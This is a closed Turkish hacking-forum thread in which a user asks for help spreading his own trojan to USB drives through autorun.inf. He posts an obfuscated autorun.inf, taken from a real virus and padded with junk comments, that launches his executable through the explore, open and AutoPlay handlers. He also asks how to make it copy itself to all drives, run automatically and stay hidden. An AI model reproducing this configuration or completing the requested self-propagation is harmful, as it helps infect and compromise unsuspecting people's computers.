autorun.inf ile trojan bulaştırma?

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

..Virtual_King..

Katılımcı Üye
12 Haz 2010
391
0
Arkadaşlar ben trojanı autorun özelliği ile flash disklere bulaştırmak istiyorum indernette kayda değer bişey bulmadım.. benim flash diskime bulaşan bir autorun.inf virüsünün kodunu kopyalayıp kendi virüsüme göre yaptım böylece virüs autorun ile çalışıyor ancak bilgisayarım flash diske çift tıklayarak girilmiyor ve kendini diğer sürücülere kopyalamıyor..

[AutoRun]

;GXVlrIRGlRpmJqa ksVBcu hQtwQ sKdYUx xRlalgnxSUoxLHFtvDE DKXn
ShElL\eXPLorE\coMmAnd= deneme.exe
;vinXkOfi floSlL
ShelL\OpEn\coMmanD = deneme.exe

;lilNEWkGnBgUENoArxVgwmkjtBjWjlFdscKm PCMywcjnWJYQEay
opEn =deneme.exe
;mWxvfqcNiqfxJrRLriVQa vqvi
SHEll\Open\DEFault=1
;ycKKyDqrRG
ShEll\AutopLaY\commanD=deneme.exe

değiştirdiğim kod bu:) sadece virüsün ismini silip kendi yeptığım virüsü yazdım:)

yapmak istediğim flash disk açıldığında vtüm sürücülere virüsün autorun ile birlikte kopyalanmasını sağlamak , virüsü otomatik açmak ve gizlemek bunu nasıl yapabiliriz yardımcı olursanız sevinirim..

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.